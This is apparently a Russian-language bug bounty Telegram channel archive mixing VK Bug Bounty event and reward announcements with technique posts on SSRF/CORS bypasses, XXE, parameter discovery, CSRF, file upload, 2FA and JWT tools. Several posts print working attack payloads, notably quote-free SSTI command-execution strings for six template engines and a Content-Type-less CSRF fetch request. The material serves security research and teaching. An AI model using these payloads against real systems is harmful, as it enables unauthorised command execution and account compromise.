🕷 BugBountyRu

🔹VK Security Confab #3: всё о Bug Bounty

27 февраля в московском офисе 💙 встречаемся на митапе VK Security Confab. В этот раз обсудим секреты и подводные камни Bug Bounty, техники поиска, инструменты и найденные уязвимости.

Программа митапа уже на сайте, а вот небольшой спойлер:

🔵Петр Уваров поделится планами VK Bug Bounty в 2025 году.

🔵Алексей Лямкин расскажет, как устроен триаж изнутри.

🔵Анна Куренова (SavAnna) поделится мнением, почему дубликат — это не проклятие, а ценный урок.

🔵Юрий Ряднина (circuit) покажет дисклозы нескольких уязвимостей ВКонтакте.

🔵Алексей Жучков (zerodivisi0n) продемонстрирует реальные кейсы, которые могут привести к удаленному исполнению кода.

И конечно, афтепати! 🔹
Обсудим доклады, обменяемся идеями и классно проведем время.

🔹 Скорее регистрируйтесь!
Встреча пройдет только офлайн, онлайн-трансляции и записи не будет.

🔹 Сбор гостей в 18:30, начало — в 19:00.

VK Security

#митап #confab #bugbounty

🕷 Обход валидации URL — основная причина многочисленных багов, включая множество кейсов SSRF, мисконфига CORS и open redirection. Они работают, используя неоднозначные URL, чтобы вызвать расхождения в парсинге URL и обойти валидацию. Однако многие из этих методов плохо документированы и в результате игнорируются.

Чтобы решить эту проблему, команда PortSwigger создала шпаргалку со всеми известными пэйлоадами. В итоге в вашем арсенале теперь есть интерактивное веб-приложение, которое автоматически настраивает свои параметры в зависимости от вашего контекста.

➡️ В настоящее время доступны три контекста:

1️⃣ Полностью определенный абсолютный URL — полезен в ситуации, когда URL используется в параметре запроса.

2️⃣ Только имя хоста — прямой ввод домена, например, в значении заголовка Host.

3️⃣ CORS Origin — где имя хоста должно использоваться в допустимом заголовке источника браузера.

➡️ Краткий обзор наиболее важных пэйлоадов:

• Обход списка разрешенных доменов: разработан для атак с путаницей доменов. Вы можете настроить тестовые домены, введя разрешенные и атакующие домены соответственно.

• Поддельные относительные URL-адреса: сюда входят допустимые браузером URL-адреса, которые могут быть неправильно проверены на стороне клиента.

• Loopback Address: этот словарь включает различные представления адресов IPv4, IPv6 и их нормализации.

➡️ Подытожим:

Не можете докрутить SSRF, мисконфиг CORS или open redirect ➡️ берете шпаргалку ➡️ выбираете нужные настройки (кодировки, кастомные параметры, имена хостов и т. д.) ➡️ копируете в Intruder ➡️ прогоняете и наслаждаетесь результатом

#шпаргалки

Portswigger расширяет возможности Burp Suite помощью AI-Powered дополнений, которые позволяют использовать не только классические сигнатурные подходы в поисках аномалий, но и мощь AI. Данные будут передаваться на сервера Portswigger (пишут что секюрьненько), и там обрабатываться (но ты же используешь коллаборатор и так?). На попробовать дают 10,000 free AI-credits, дальше за деньги.

https://portswigger.net/blog/the-future-of-security-testing-harness-ai-powered-extensibility-in-burp-nbsp

Cтикерпак для влюбленных в BB от VK 3>, забирайте в канале выше )

https://paragraph.xyz/@cybred/supply-chain-bug-bounty

Атака на цепочку поставок в рамках CI/CD и бизнес-процессов компании. Стоит обратить внимание в рамках реализации "недопустимых событий" или APT-bounty.

https://habr.com/ru/companies/owasp/articles/879512/

🤖 DEEPSEEK RCE/SSRF.

Хайповая AGI deepseek позволяет выполнять произвольные команды, на виртуальном окружении, в котором запущен агент вашей сессии чат-бота с генеративным искусственным интеллектом. Это дает возможность, в том числе и злоумышленникам, использовать мощности этой экосистемы для атак или вредоносных действий.

🐧 Бесплатные cloud-native linux системы. Иногда есть необходимость что-то проверить в своих системах с внешнего хоста, а покупать сервер не хочется или нет возможности. На помощь придут сервисы типа segfault.net (ssh - root:segfault; анонимизированный, есть ограничения, таймаут) или terminator.aeza.net (web-based linux (+Win); ограничение - 15 минут).

Вы когда-нибудь сталкивались с веб-приложением, возвращающим ответ XML? Оно может скрывать уязвимость XXE.

💡Несколько советов, которые помогут эффективно выявлять и эксплуатировать эту уязвимость:

1️⃣ Определите точку входа: ищите пэйлоад XML в HTTP-запросах или функционале загрузки файлов.

Он может появляться в API, SOAP-сервисах или функционале анализа документов (например, SVG, DOCX и т. д.). Попробуйте изменить HTTP-заголовок Content-Type на application/xml или text/xml, чтобы увидеть ответ сервера.

2️⃣ Error-based feedback: если сервер отклоняет запрос, проверьте наличие конкретных сообщений об ошибках, которые могут указывать на ограниченное использование DTD. К распространенным ошибкам относятся:

• DOCTYPE is not allowed;
• Parsing error: External entities are disabled;
• Invalid entity Declaration.

Если появляются такие ошибки, использование DTD может быть заблокировано.

3️⃣ Blind XXE с внешним ресурсом: проверьте наличие слепой XXE путем загрузки удаленного ресурса, который вы контролируете.

Вы можете использовать Burp Collaborator или другие инструменты для подтверждения уязвимости путем обнаружения DNS или HTTP колбэков. Это возможно в случае, если сервер может делать запросы к внешним ресурсам (пример #1).

4️⃣ Использование локальных файлов DTD в Linux: некоторые Linux-системы хранят файлы DTD, которые можно использовать для эксплуатации XXE.

/usr/share/xml/fontconfig/fonts.dtd

Например, файл fonts.dtd содержит внедряемую сущность %constant, которую можно переопределить для включения вредоносной сущности. Это позволяет перехватить процесс парсинга и внедрить свой пэйлоад (пример #2).

5️⃣ Обход WAF через кодировку символов: XML-парсеры определяют кодировку с помощью HTTP-заголовков, BOM или декларации XML.

Вы можете использовать это для обхода WAF, преобразуя пэйлоад в другую кодировку (пример #3).

#техники

В одном из недавних постов мы разбирались с понятием parameter discovery. Приведенные инструменты помогут в выявлении скрытых эндпоинтов, недокументированных параметров и незамеченных путей, которые расширяют зону атаки.

Сегодня мы пойдем дальше и познакомимся с такими практическими методами, как фаззинг параметров, forced browsing и поиск путей/параметров, а также разберемся, как использовать целевые словари, парсить файлы и анализировать JavaScript, чтобы находить точки входа для более результативного багхантинга.

1️⃣ После получения полной структуры приложения с помощью Burp Suite, проанализируйте файлы robots.txt и sitemap.xml на наличие пропущенных путей, используйте Google-дорки и инструменты из предыдущего поста для улучшения процесса поиска параметров.

2️⃣ Сделайте акцент на анализе JavaScript-файлов. Это помогает понять, какие параметры стоит начать фаззить, какие роуты, скорее всего, обрабатывают конфиденциальные данные и где могут быть неправильные настройки.

Полезные инструменты:

🖤 LinkFinder — простой Python-скркипт, который сканирует JavaScript-файлы и извлекает URL-адреса, пути и параметры.

🖤 jsluice — Go-пакет и CLI-инструмент для извлечения URL-адресов, путей, секретов и других интересных данных из исходников JavaScript.

🖤 JavaScript bookmarklet — сниппет JavaScript-кода, сохранённый в виде закладки в браузере. При нажатии на любую веб-страницу код запускается в браузере и извлекает информацию без использования внешних инструментов или переключения контекста.

👉 Пример извлечения эндпоинтов из JavaScript:

javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0–9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();

🖤 Расширения Burp Suite для анализа JavaScript: JSLinkFinder, GAP, JSpector и другие.

3️⃣ Фаззинг — отправка различных, часто неожиданных входных данных, включая пути, параметры или HTTP-заголовки, на эндпоинты приложения.

👉 Цель: спровоцировать пограничные случаи, выявить функции, которые никогда не предназначались для публичного использования, и обнаружить слабые места в логике приложения.

👉 Основные возможности:

🖤 Обнаружение скрытых или секретных эндпоинтов.
🖤 Выявление неправильных настроек или проблем с контролем доступа.
🖤 Автоматизация изучения поведения целевого веб-приложения.
🖤 Понимание механизмов работы целевого веб-приложения.

👉 Основные этапы:

💚 Определите базовый уровень: начните с эндпоинтов, которые вы уже обнаружили с помощью ручного сканирования, анализа JavaScript и forced browsing.

💚 Forced browsing: даже хорошо защищённые приложения иногда полагаются на предсказуемые соглашения об именовании, оставшиеся файлы резервных копий или директории по умолчанию, которые, по мнению разработчиков, не будут найдены.

Используя эти предположения, forced browsing предполагает систематическое угадывание путей к файлам, директориям и расширениям для доступа к скрытым или ограниченным ресурсам. Простой пример: settings.php.bak, settings.bak, settings.php.old, settings.old, settings_old.php, settings.php~.

💚 Изучение распространенных административных или других директорий.

4️⃣ Словари: предоставляют входные данные для тестирования эндпоинтов и параметров.

🖤 Общие: common.txt, fuzz.txt.
🖤 Для конкретного языка программирования, фреймворка или стека: ColdFusion и другие.

5⃣ Фаззинг с помощью CLI-инструментов: поиск путей/директорий/расширений, parameter discovery.

Полезные инструменты: feroxbuster, ffuf, dirb, gobuster.

6⃣ Фаззинг с помощью Burp Intruder.

#техники #инструменты #разведка

Существует множество способов, с помощью которых веб-приложения реализуют защиту от CSRF-атак. Методы защиты, которые являются скорее неявными, чем явными, обычно более рискованны, особенно если они полагаются на неизменность политики браузеров в отношении допустимых действий.

Одной из интересных попыток защиты от CSRF является отклонение запросов с заголовком Content-Type, отличным от application/json. Эффективность этого подхода связана с тем, что браузеры разрешают отправку запросов с заголовками только application/x-www-form-urlencoded, multipart/form-data и text/plain (а также, возможно, несколькими другими исключениями) в cross-site запросах. Можно отправлять произвольные значения, но только в том случае, если сайт-получатель предоставил разрешение через CORS.

💡 Если защита от CSRF реализована как показано в примере выше, есть новый способ обхода. Он основан на том, что API fetch принимает в качестве параметра body не только String, но и объекты типа Blob.

Это важно, так как Blob — более сложный объект, чем строка: он содержит не только данные, но и связанную с ними информацию о типе, либо может вовсе не иметь типа. Создав объект Blob без типа и передав его в функцию fetch, можно отправить cross-site POST-запрос без CORS, который не будет содержать заголовок Content-Type. Это применимо не только для пустого тела запроса, поскольку данные, переданные в Blob, становятся телом HTTP-запроса.

Использование fetch для POST-запроса без Content-Type:

fetch("https://victim.com", {
  method: "POST",
  body: new Blob(["payload"])
});

Результирующий POST-запрос с Content-Length, но без Content-Type:

POST / HTTP/1.1
Host: victim.com
Connection: keep-alive
Content-Length: 7
sec-ch-ua: "Google Chrome …."
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 …
sec-ch-ua-platform: "Linux"
Accept: */*
Origin: https://example.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://example.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9

payload

#техники

Процесс выявления несвязанных, неиспользуемых или просто скрытых параметров, которые принимаются веб-приложением и могут позволить пользователю управлять поведением приложения с помощью этих скрытых параметров, часто называют parameter discovery.

Cкрытые параметры могут позволить управлять поведением приложения и привести к успешной реализации многих сценариев атак: от XSS и SQL-инъекций до внедрения команд и IDOR.

⚙️ Ниже — несколько полезных инструментов, которые помогут автоматизировать и упростить эту работу:

💜 x8 (Rust): помогает выявлять скрытые параметры, которые потенциально могут быть уязвимыми, или интересные функции, которые могут быть упущены другими багхантерами.

Его высокая точность достигается за счёт построчного сравнения страниц, сравнения кодов HTTP-ответов и анализа результатов вывода.

💜 Arjun (Python): находит допустимые HTTP-параметры с помощью огромного дефолтного словаря. Словарь можно изменить в случае необходимости.

💜 ParamSpider (Python): ищет параметры в веб-архивах, поддоменах и других источниках.

💜 Param-Miner (расширение Burp Suite): используется для поиска скрытых и несвязанных параметров, особенно при поиске уязвимостей вроде Web Cache Poisoning.

Инструмент включает расширенную логику сравнения из Backslash Powered Scanner с методом бинарного поиска, чтобы угадывать до 65 000 названий параметров в каждом запросе. Названия параметров берутся из встроенного словаря и из всего трафика в скоупе.

🥷🏿 Простой пример автоматизации

1. Parameter discovery с помощью ParamSpider:

python3 paramspider.py --domain <target_domain> --level high --output params.txt

2. Запуск шаблонов XSS gf для извлечения параметров, которые могут быть уязвимы для XSS:

gf xss.json params.txt | tee xss.txt

3. Запуск dalfox в отношении тех URL-адресов, которые потенциально уязвимы для XSS:

cat xss.txt | dalfox pipe

#инструменты #разведка

Уязвимости при загрузке файлов возникают из-за небезопасной реализации функционала загрузки, особенно когда компонент выполняет слабую или вовсе не выполняет проверку загруженного файла. Критичность этого класса уязвимостей может быть разнообразной: от stored XSS до RCE.

Условия для успешной эксплуатации:
❣️ Доступ к файлу: необходимо знать полный путь к файлу, чтобы обратиться к нему.
❣️ Тип контента: если сервер меняет MIME-тип файла на безопасный, выполнение кода может стать невозможным.

Базовые методы эксплуатации:
❣️ Загрузка файла с вредоносным кодом, например, PHP-скрипта.
❣️ Обход client side ограничений (HTML-атрибут accept) с помощью прокси для изменения данных HTTP-запроса.

Обход защитных механизмов:
❣️ Черные списки расширений: использование нестандартных расширений или манипуляция именем файла.
❣️ Белые списки расширений: использование разрешенных расширений с вредоносным содержимым.
❣️ Проверка MIME-типа: загрузка файла с корректным MIME-типом, но вредоносным содержимым.

Примеры сложных атак:
❣️ Перезапись конфигурационных файлов (например, .htaccess) для изменения настроек сервера.
❣️ Использование магических байтов: изменение первых байтов файла для прохождения проверки типа.

💡 Важные советы:
❣️ Комбинируйте методы обхода для выявления слабых мест.
❣️ Учитывайте особенности технологий на стороне сервера и создавайте специализированный пэйлоад.
❣️ Не знаете, с каким списком имеете дело: черным или белым? Попробуйте загрузить файл с произвольным расширением. Если он был принят, скорее всего, используется черный список. Если загрузка отклонена, скорее всего, это строго определенный белый список.

🔗 Погрузиться подробнее
🔗 Fuxploider — инструмент для автоматизации обнаружения и эксплуатации недостатков форм загрузки файлов
🔗 Upload Scanner — сканер загрузки файлов для Burp Suite
🔗 FileUpload — расширение OWASP ZAP для поиска уязвимостей в функциональности загрузки файлов
🔗 Заметки на PayloadsAllTheThings

👀 Вам когда-нибудь требовалась быстрая визуализация вашей цели? В случае большого скоупа вручную это делать крайне неэффективно.

📸 gowitness — простой Go-инструмент, который делает скриншоты, регистрирует HTTP-статусы и собирает сведения о сервере. Это делает его идеальным для разведки, когда у вас есть длинный список доменов для анализа.

👩‍💻 Быстрый старт

Установка:

go install github.com/sensepost/gowitness@latest

Запуск:

gowitness scan single --url "https://example.com" --write-db

P. S. Можно скачать бинарь, если не хотите устанавливать gowitness.

⚒️ Похожие инструменты:
• EyeWitness
• WitnessMe
• Snapback
• Aquatone

#инструменты #разведка

Любые функции, которые поддерживают расширенную пользовательскую разметку, могут быть уязвимы для SSTI, включая wiki-страницы, обзоры, маркетинговые приложения, CMS-системы и т. д.

По умолчанию многие шаблонизаторы имеют включенное автоматическое экранирование или выполняют экранирование HTML перед процессом рендеринга шаблона. Иногда это значительно усложняет сценарий эксплуатации из-за фильтрации кавычек, используемой для рендеринга строковых данных.

Без строковых данных в какой-либо форме RCE значительно сложнее достичь для некоторых шаблонизаторов, ярким примером которых является Twig. Однако для других эксплуатация остается относительно простой даже без использования кавычек.

Так почему бы не создать набор пэйлоадов для популярных шаблонизаторов с импактом RCE, которые используют только дефолтные функции и методы из шаблонизатора и не используют какие-либо кавычки или ресурсы, доступные за пределами самого шаблонизатора? Это гарантировало бы работу пэйлоада в максимально возможном количестве сценариев эксплуатации.

Разберем несколько примеров, а остальные читайте в исследовании багхантера из YesWeHack:

🟠Jinja2 (Python) позволяет выполнять Python-код через глобальные переменные:

Получение строки id:

{{self.__init__.__globals__.__str__()[1786:1788]}}
  

Выполнение команды id с помощью os.popen:

{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen(self.__init__.__globals__.__str__()[1786:1788]).read()}}
  

🟠Twig (PHP) отличается сложностью из-за автоматического экранирования, но RCE возможна через функции passthru:

Эксплуатация через двойной рендеринг:

{{id~passthru~_context|join|slice(2,2)|split(000)|map(_context|join|slice(5,8))}}
  

🟠Smarty (PHP) использует функцию chr для построения строк.

Выполнение команды id:

{{passthru(implode(Null,array_map(chr(99)|cat:chr(104)|cat:chr(114),[105,100])))}}  
  

🟠Razor (ASP.NET) поддерживает выполнение C#-кода, позволяя напрямую запускать системные команды:

Генерация команды whoami:

@{string x=null;int[]l={119,104,111,97,109,105};foreach(int c in l){x+=((char)c).ToString();};}@x
  

Выполнение команды:

@System.Diagnostics.Process.Start("cmd.exe", "whoami");
  

🟠Groovy (Java) использует execute для запуска полученной строковой команды как системной:

${x=new String();for(i in[105,100]){x+=((char)i).toString()};x.execute().text}

🟠FreeMarker (Java) преобразует числа в строки через lower_abc, что позволяет создавать пэйлоад для выполнения команд:

${(6?lower_abc+18?lower_abc+5?lower_abc+5?lower_abc+13?lower_abc+1?lower_abc+18?lower_abc+11?lower_abc+5?lower_abc+18?lower_abc+1.1?c[1]+20?lower_abc+5?lower_abc+13?lower_abc+16?lower_abc+12?lower_abc+1?lower_abc+20?lower_abc+5?lower_abc+1.1?c[1]+21?lower_abc+20?lower_abc+9?lower_abc+12?lower_abc+9?lower_abc+20?lower_abc+25?lower_abc+1.1?c[1]+5?upper_abc+24?lower_abc+5?lower_abc+3?lower_abc+21?lower_abc+20?lower_abc+5?lower_abc)?new()(9?lower_abc+4?lower_abc)}

🤯 Каждый багхантер хотя бы раз сталкивался с проверками при загрузке файлов: расширения, MIME-тип, структура файла, магические байты. Но задумывались ли вы, как можно обойти ограничения на загрузку файлов для эксплуатации Client-Side Path Traversal (CSPT)?

Команда Doyensec поделилась исследованием, раскрывающим кейсы эксплуатации слабых мест проверок для выполнения сложных атак, включая CSPT, CSRF и XSS.

1⃣ JSON как инструмент для обхода

JSON — популярный формат передачи данных, который можно использовать для обхода проверок загрузки. Многие приложения проверяют загружаемые файлы, используя библиотеки и инструменты для проверки MIME-типа и структуры. Однако правильно сформированный JSON может пройти эти проверки и быть обработан на стороне клиента.

2⃣ Обход проверок PDF

Исследование показывает, как создать файл, который будет распознаваться как PDF, но при этом оставаться валидным JSON для клиента:
• mmmagic (обычно используется в приложениях Node.js для определения типов файлов): достаточно поместить заголовок %PDF в первые 1024 байта.
• pdflib: Использование допустимой структуры PDF с минимальными корректировками (например, замена %0A на %20).

3⃣ Проблемы с командой file

Команда file ограничивает количество байтов для анализа. Это ограничение можно использовать, добавив в файл большое количество пробелов. Проверка файла завершится ошибкой, и файл классифицируется как PDF.

4⃣ Обход проверки изображений (WEBP)

Создание JSON-файла с магическими байтами WEBP в нужном месте позволяет пройти проверку формата изображения:

{"aaa": "WEBP", "_id": "../../../../CSPT?"}

🎯 Ключевые методы обхода

Что использовать:
• Создание файлов, которые валидны сразу для нескольких форматов.
• Анализ исходного кода библиотек проверки (например, mmmagic, pdflib, file-type).
• Эксплуатация технических ограничений, таких как лимиты чтения данных.

Где применимо:
• CSPT → обход путей на стороне клиента.
• CSRF → выполнение межсайтовых запросов.
• XSS → внедрение вредоносного JavaScript.

🔍 Мониторинг JavaScript-файлов для поиска уязвимостей

В ходе разведки багхантеры обычно начинают с изучения скрытых активов, директорий, файлов и эндпоинтов. Однако они часто упускают из виду интересную информацию, которая загружается по умолчанию, — JavaScript-файлы.

Если мониторить изменения в JavaScript-файлах в режиме реального времени, можно обнаружить новые функции или изменения в существующих, которые потенциально могут быть уязвимыми. Также не стоит забывать про случайно опубликованные секреты, которые можно найти в коде.

Для тех, кто ценит автоматизацию, мониторинг JavaScript-файлов — это настоящий кладезь для изучения. Начните с JSMon — инструмента для мониторинга изменений в JavaScript-файлах. Этот инструмент позволяет отслеживать обновления файлов и анализировать их содержимое.

Для парсинга используется библиотека Tree-sitter, представляющая собой инструмент инкрементального парсинга. Она строит синтаксическое дерево исходного файла и эффективно обновляет его при редактировании. Это позволяет легко анализировать изменения в JavaScript-файлах.

Еще один полезный инструмент — jsluice. Это простой Go-пакет и CLI-инструмент для извлечения URL-адресов, путей, секретов и других ценных данных из исходного кода JavaScript.

Чтобы улучшить автоматизацию, jsluice можно использовать в связке с Notify от ProjectDiscovery. Этот инструмент транслирует выходные данные нескольких утилит (или считывает их из файла) и публикует уведомления на различных платформах, таких как Slack, Discord, Telegram и другие.

#инструменты

Не смогли попрощаться с Bounty pass в 2024 году, поэтому теперь Bounty pass – навсегда! 🔥

Мы ярко провели юбилейный для VK Bug Bounty год: запустили программу лояльности для багхантеров, отменили лимиты на максимальные выплаты благодаря накопительному бонусу, провели серию специальных ивентов... И поняли, что не время прощаться!

С этого дня мы запускаем Bounty pass: Forever! 🎉

Что будет?

🛍 Накопительный бонус по уровню критичности: до +5% к каждому следующему вознаграждению. ☝️Запоминаем: чем больше находишь критических уязвимостей – тем больше бонус!

🗓 Срок действия бонуса – 1 год с момента сдачи отчета

➕ Все бонусы суммируются

🏆 Все участники Bounty pass в 2024 году получают 5% к каждому оплачиваемому отчету до конца 2025 года. А если багхантер отправил за год более 10 оплачиваемых отчетов или заработал более 1 миллиона рублей, то он получает на старте сразу 10%.

🎁 Мерч (как же без него 😏):
каждый квартал будем дарить крутой мерч всем багхантерам, которые сдадут 4+ оплачиваемых отчета или получат вознаграждение больше 400 000 рублей.

👉 Все детали новых условий собрали на новом сайте

Ждем ваши новые отчеты в программе VK Bug Bounty на платформах Standoff, BI.ZONE Bug Bounty и Bugbounty.ru!

@VK Security

#bugbounty #bountypass #forever

™️ Новая программа от VK уже на BugBounty.ru!

Хантеры, готовы к новогоднему подгону от VK?

VK Video теперь доступна на платформе BugBounty.ru!

Область поиска: веб-ресурсы и мобильные платформы Android и iOS, и TV.

Двухуровневый скоуп:
vkvideo.ru, m.vkvideo.ru, api.vkvideo.ru — до 2,4 млн
live.vkvideo.ru — до 1,2 млн

Время открывать баги и зарабатывать по-крупному!

Программа уже тут.

Bounty pass#3: Advent — на финишной прямой

19 декабря закончится наш предновогодний багхантерский марафон и завершим Bounty pass#3: Advent мы шумной вечеринкой BB Advent Party. 🕺

А пока смотрите, что скрывало последнее окошко в нашем адвент-календаре для багхантеров — промокод на 150 000 рублей! 😲

🏃 Есть еще сегодня, выходные и 4 суток, чтобы собрать все подарки адвента! Го сдавать ваши отчеты в программы VK Bug Bounty на платформах Standoff, BI.ZONE Bug Bounty и Bugbounty.ru!

@VK Security

#bugbounty #bountypass #advent

Рынок уязвимостей | пентесты и BAS-технологии | Эпизод 6

Как изменился мир пентестов, и почему Breach and Attack Simulation (BAS) становится трендом? 🤔

Что обсудили:
⚫️Топовые инструменты: Burp Suite, Cobalt Strike, Sliver – что выбирают пентестеры?
⚫️BAS-технологии: заменят ли они классические пентесты?

🎙Наши эксперты:
Модератор: Лука Сафонов, Киберполигон

Спикеры:
⚫️Дмитрий Курамин, Инфосистемы Джет
⚫️Анатолий Песковский, Информзащита
⚫️Сергей Куприн, CtrlHack


📱 VK | 📺 RUTUBE | 📺 YouTube |

🖤Смотрите подкаст, ставьте лайки и делитесь своим мнением.

🔐 2FA стала основным решением для усиления безопасности учетных записей. Все больше компаний внедряют реализации 2FA, а некоторые даже навязывают их своим пользователям, чтобы защитить от несанкционированного доступа.

Но когда в реализацию вносятся дополнительные изменения или когда игнорируются передовые практики безопасности, могут возникнуть всевозможные баги 2FA, которые создают предпосылки для обхода любой обязательной многофакторной аутентификации.

Разберем несколько простых способов обхода 2FA и не только:

1️⃣ Forced browsing: когда реализация 2FA не может привязать ваш верификационный токен к текущему состоянию сессии.
2️⃣ Брутфорс: отсутствие ограничения скорости в сочетании с предсказуемыми и/или короткими токенами делает любую реализацию 2FA уязвимой для атак методом перебора.
3️⃣ Слабые токены. Другой простой способ обойти 2FA — изучить токен и проверить, соответствует ли он следующим критериям:

✔️ Можно повторно использовать тот же старый токен или вообще не передавать его.
✔️ Можно повторно использовать любой из резервных токенов.
✔️ Токен не привязан к сессии.
✔️ Токен находится в любом месте HTTP-ответа.
✔️ Любые статические токены для тестирования и разработки.

4️⃣ Отключение 2FA через CSRF.
5️⃣ Отключение 2FA через IDOR.
6️⃣ Отключение 2FA через форму сброса пароля.
7️⃣ Обход 2FA второго порядка с помощью path traversal.

💭 Кстати, знаете, как проэксплуатировать багу на втором скрине?

HTTP-запрос 1:

POST /api/auth/2fa/verify HTTP/1.1
Host: app.example.com
Content-Type: application/x-www-form-urlencoded
User-Agent: ...

HTTP-запрос 2 (внутренний):

GET /api/ HTTP/1.1
Host: api-prod. internal: 3001
X-User-Id: 84556

#этобаза

Спойлерим программу конференции VK Security Confab Max

💥 Опубликовали на сайте программу нашей конференции VK Security Confab Max 11 декабря

Что нас ждет? Как и обещали – лютый хардкор!
🤘 Нон-стоп!

Два трека с техническими докладами от ведущих экспертов VK и крупнейших BigTech-компаний.

Ключевые темы:

⭐️ Работа SOC в BigTech: управление алертами и потоком событий, требования к SIEM, а также обнаружение атак.

🛡 Защита инфраструктуры: Service Mesh, эволюция сканирования распределенной инфраструктуры и обнаружение открытых портов.

🎮 Уязвимости: Построение Vulnerability Management в современных реалиях, эксплуатация уязвимостей SSRF и mXSS и защита от них.

🔍 Bug Bounty: концепция Bug Bounty 2.0, защищенность соцсетей и серьезные уязвимости в системах, которые можно обнаружить не только багхантерам.

⚙️ Безопасность приложений (AppSec): безопасность API c применением ML и AI, поиск и приоритизация уязвимостей в зависимостях, разбор популярных сканеров и их недостатков.

💭 Защита облачных технологий: харденинг k8s, защита от атак в публичном облаке, а также техническое устройство сетевой изоляции в облаке.

📍 Москва, офис VK + трансляция онлайн

📅 11 декабря 2024 года

Участие бесплатное, но мест мало
👉 жмите, чтобы зарегистрироваться и узнать программу

➡️ Подписывайтесь на канал VK Security, чтобы не пропустить новости о мероприятии

#confab #max #конференция

🕷 Как популярные браузеры анализируют HTML и как эта информация может помочь выявить mXSS?

Об XSS с мутациями (mutation-based XSS или mXSS) в сообществе багхантеров известно уже давно, но так ли часто вам удается их найти в реальных багбаунти-программах? С Dom-Explorer точно удастся.

🤔 В чем сложность mXSS?

mXSS использует код, который воспринимается HTML-санитайзерами как безопасный, а после прохождения очистки мутирует во вредоносный. В этом и состоит парадоксальность и опасность этого типа XSS атак.

Dom-Explorer как раз полезен для обнаружения и поиска mXSS. Он демонстрирует, как популярные средства парсинга HTML реагируют на любую заданную HTML-строку, чтобы помочь вам выявить непредвиденное поведение, которое может открыть новые перспективные области для исследований. Поддерживаемые типы парсеров/санитайзеров: Ammonia, Angular, DomParser, DomPurify, HighlightJs, JsXss, Parse5, SafeValues, SrcdocParser, TemplateParser.

Главная фича — скорость тестирования новых идей и мгновенное отображение результатов. Инструмент, на который он больше всего похож, — это Live DOM Viewer с более скудными возможностями. А вдохновлялся автор всем известным Cyberchef.

До появления Dom-Explorer проведение такого рода исследований занимало гораздо больше времени — «особенно если вы тестируете глубоко вложенные элементы» — и включало гораздо больше этапов, говорит разработчик инструмента. Иногда это было практически «невозможно сделать с помощью классических инструментов».

💡 Dom-Explorer рекомендуется использовать в сочетании с HTML Living Standard от WHATWG и проверять, соответствуют ли браузеры этому стандарту.

🔗 Попробовать Dom-Explorer в деле
🔗 GitHub
🔗 Анонс инструмента

#инструменты

🐧 Коллекция шпаргалок по командам и утилитам Linux

Почему багхантеры используют именно эту ОС для работы? Причины у каждого свои, но вот, кажется, основные:

➖ Гибкость, кастомизация и множество инструментов безопасности, которые работают из коробки или оптимизированы для Linux.
➖ Сообщество и дистрибутивы для анализа безопасности: тот же Kali Linux, Parrot OS и многие другие.
➖ Эффективная работа с сетью.
➖ Скрипты и автоматизация: bash, Python, cron и другие инструменты, которые упрощают жизнь.
➖ Открытый исходный код и многое другое.

#шпаргалки

😈 Подписанные веб-токены широко используются для аутентификации и авторизации без сохранения состояния в вебе. Самый популярный и знакомый всем формат — JSON Web Tokens (JWT), но за его пределами процветает разнообразная экосистема стандартов, каждый из которых имеет собственную реализацию хранения данных и безопасности.

Чтобы помочь оценить их, команда PortSwigger выпустила новое опенсорсное расширение SignSaboteur. Это расширение Burp Suite, которое поддерживает различные типы токенов, включая Django, Flask и Express, оно позволяет редактировать, подписывать, проверять и атаковать эти токены.

Инструмент обеспечивает автоматическое обнаружение и встроенное редактирование токенов в HTTP-запросах/ответах и ​​веб-сокетах. Под капотом — готовые словари для секретных ключей и соли по умолчанию, а также поддержка строк в JSON-кодировке и кастомных словарей. Вы также можете сохранять известные ключи для будущих атак и изменять подписанные токены в разделах Proxy и Repeater.

🕷Ключевые фичи:

✅ Автоматическое обнаружение и редактирование: встроенное редактирование токенов в HTTP-запросах/ответах и веб-сокетах.
✅ Готовые словари: включают в себя секретные ключи и соли по умолчанию, а также поддержку кастомных словарей и строк в JSON-кодировке.
✅ Брутфорс атаки: автоматизирует атаки методом перебора с использованием известных ключей и различных методов вывода.
✅ Атаки для обхода авторизации: поддерживает множественные атаки байпаса.
✅ Режим неизвестных подписанных строк: обнаруживает и анализирует неизвестные подписанные токены с использованием различных функций хеширования.

Читать подробнее:
🔗 Обзор на YesWeHack
🔗 Анонс на PortSwigger
🔗 GitHub

#инструменты

🎙️ Рынок уязвимостей, сканеры уязвимостей: подкаст Global Digital Space

Кто-то ищет баги вручную, кто-то полагается на сканеры, а кто-то разрабатывает уникальные подходы. Одно точно ясно — это важный инструмент как для атакующей, так и защищающей стороны.

Но как выглядит рынок сканеров сегодня и какие перспективы его ожидают? Об этом размышляют Лука Сафонов и эксперты отрасли:

➖ Владимир Иванов (Scanfactory)
➖ Кирилл Селезнёв (CICADA8)
➖ Александр Леонов (Positive Technologies)

⌛️ Таймкоды:

00:00 — начало
1:54 – 10:42 — история рынка сканеров
11:20 – 14:27 — что под капотом у сканеров
14:40 – 15:35 — про российские сканеры
15:37 – 20:22 — обмен фидами
21:00 – 31:17 — чем пользуются атакующие
32:00 – 40:27 — EASM vs VM
40:57 – 46:31 — нужен ли патчинг
50:00 – 55:30 — все ли уязвимости эксплуатабельны
56:40 – 1:00:35 — фолзы
1:01:00 – 1:08:00 — взгляд пентестеров и проблема VM
1:08:40 – 1:13:00 — детект уязвимостей и квалификация
1:14:19 – 1:35:50 — EASM решает другие задачи?
1:35:50 – 1:43:51 — тренды рынка

📱 VK
📺 RUTUBE
📺 YouTube

#подкасты

🕷 Команда ProjectDiscovery представила новый инструмент URLFinder, который раньше являлся частью фреймворка Katana

